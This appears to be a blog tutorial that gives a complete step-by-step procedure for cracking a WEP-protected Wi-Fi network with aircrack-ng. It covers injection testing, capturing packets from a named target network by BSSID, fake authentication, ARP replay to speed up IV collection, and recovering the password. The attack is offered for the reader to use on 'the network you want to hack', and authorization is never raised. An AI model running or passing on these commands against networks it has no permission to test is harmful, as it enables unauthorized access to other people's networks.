Check Injection Support

Aircrack-ng has a comprehensive article related to checking injection support. You might check their website out for it. I am just providing the commands which will be enough to find out whether injection is working or not. 

airmon-ng start wlan0  [or wlan1]

(Puts your wireless adapter in monitor mode. From now we'll refer to wlan0/wlan1 as mon0

airserv-ng -d mon0

 aireplay-ng -9 127.0.0.1:666

This basically sets up a temporary server sort of thing that is waiting for you to test your injection capabilities. The second command actually tries to inject the server, and succeeds. 127.0.0.1 is the IP which is reserved for loopback. It is always used when you are carrying out some command on yourself. 666 is the port we are using. Most of the time, what follows an IP and a colon is the port. The general form is somewhat like IP:port. So finally you have checked your injection capabilities, and the last line - "Injection is working!" should bring a smile to your face. If not, you'll have to buy a card which supports injection, or see some forum posts which will help you figure something out.

Check Signal Strength

While the basic hacking methods from the previous post don't have any real strength restriction, you need to be physically close to the access point in order to inject packets. There is information regarding the same in the same aircrack-ng tutorial. Again, I'm gonna summarize what you have to do here.

First, we will use airodump-ng mon0 to see the list of networks in range. See the one you want to hack.

Airodump-ng lists the networks in range.

Now we will hack the digisol network. Make a note of the BSSID of the network you want to hack.  A good practice is to store all the information gathered in any text editor. We should, at this stage, take a note of following:-

• ESSID -  DIGISOL
• BSSID - 00:17:7C:22:CB:80
• CH (channel) - 2
• Mac address of genuine users connected to the network:
• Interface : wlan1 - referred to as mon0

You should gather the equivalent information for the network you will be working on. Then just change the values whenever I use them in any of the commands

Note : We need at least one user (wired or wireless) connected to the network and using it actively. The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets.

Now, to check whether the signal strength will be sufficient, we will simply execute the following code-

airodump-ng [interface] -c [channel]

airodump-ng mon0 -c 2

This will make the wireless card only read packets in the channel no. 2, on which our target network is.

Now to test the network, type the following code-

aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0 

 The last time we checked whether the wireless card had the capability to inject packets. We tested it on our own computer. This time, we actually injected packets into the target computer. If this worked, then it's pretty good news, and it means that you are most probably going to be able to hack this network. The last line 30/30 : 100% determines how good the strength of the signal is. A very high percentage is a good sign, and 100 is ideal.

Capture Packets

Now we have already run airodump-ng a couple of times. However, this time we will pass the -w command which will instruct airodump-ng to save the output to a file.

airodump-ng -c [channel] --bssid [bssid]-w [file_name] [interface]

airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0

 Now the output will be saved in a file  dump-01.cap
Now we can keep this terminal running and it will keep saving the packets.  [In the previous tutorial we did only 2 things, capture the packet, i.e this step, and crack it, i.e. the step we are going to do last. While it makes our work easier to just follow two steps, it also makes the process much more time consuming, since we are simply a passive packet listener, who is not doing anything]

Speeding Things Up

Fake Authentication

Now to speed things up, we will inject the network. We will thus obtain ARP packets. These packets will fill up the data column of our airodump-ng capture, and data is what will help us obtain the password. As soon as we have 10000 data packets, we can start attempting to get the password using aircrack-ng.

Now to make the AP pay attention to your injected packets, you either have to be a connected client, or have to pretend to be one. You can either mask your mac address to one of the already connected clients, or use the fake authentication feature. We will do the latter. (If you see an error like the AP is on channel x and mon0 is on channel y then go to the bottom of the post for troubleshooting)

aireplay-ng -1 0 -e DIGISOL -a  00:17:7C:22:CB:80 mon0

Authenticated and capturing packets

 ARP request replay mode

ARP packets are your best bet at getting a lot of IVs or data. Without IVs you can't hack a network. Enter the following code to make aireplay-ng listen to the AP for ARP packets, and inject them as soon as they find one. This will create a lot of data very fast. This is the real speeding step. 

aireplay-ng -3 -b [BSSID] mon0

This is what the final code will look like-

aireplay-ng -3 -b  00:17:7C:22:CB:80 mon0

This is what it'll look like in the beginning

 Now you'll have to wait for some time till it gets an ARP request. As soon as it gets one, the terminal will sort of explode. And the data packets will start filling in with Godspeed. Now this is the part where an active user on the network is absolutely necessary.

Slow start

Everything got fine after some time

After some time I had enough packets to crack almost any network

The data filled in VERY fast

The video shows how fast the IVs flowed in after ARP injection started.

Cracking the network

Cracking the network is as easy as typing the following into the console

aircrack-ng name_of_file-01.cap

In our case, the command will be

aircrack-ng dump-01.cap

 After pressing enter, you will have a list of networks and you'll be prompted to select which one of them to hack. In my case there was just one network, so I couldn't get that screen, or a screenshot. The password was cracked in less than a second.

I have blurred out the password and some random stuff.

So finally you have obtained the password of the network you were trying to hack.

Troubleshooting

A person commented on another wireless hacking post. This is the problem he faced.

whenever i try to use aireplay-ng, with the options, always fail saying that mon0 is in channel -1 and the target is in other channel. How can i fixed this? i looked a lot for a real answer but nobody know what is this.

This is a possible solution

Okay, try the following-
1) When you start the monitor mode, specify the channel - 
usage: airmon-ng [channel or frequency]
Your code : airmon-ng start wlan0 6
Substitute 6 with the required channel.
2) While starting airodump, specify the channel
airodump-ng mon0 -c 6

I was facing this problem when my mon0 kept hopping from one channel to the other, and the second step alone solved my problem. If your airmon-ng assigns itself a fixed channel on its own will, without you even specifying it, then the problem might be more complicated. If the above steps don't solve the problem, take a look here - http://ubuntuforums.org/showthread.php?t=1598930

Read full post »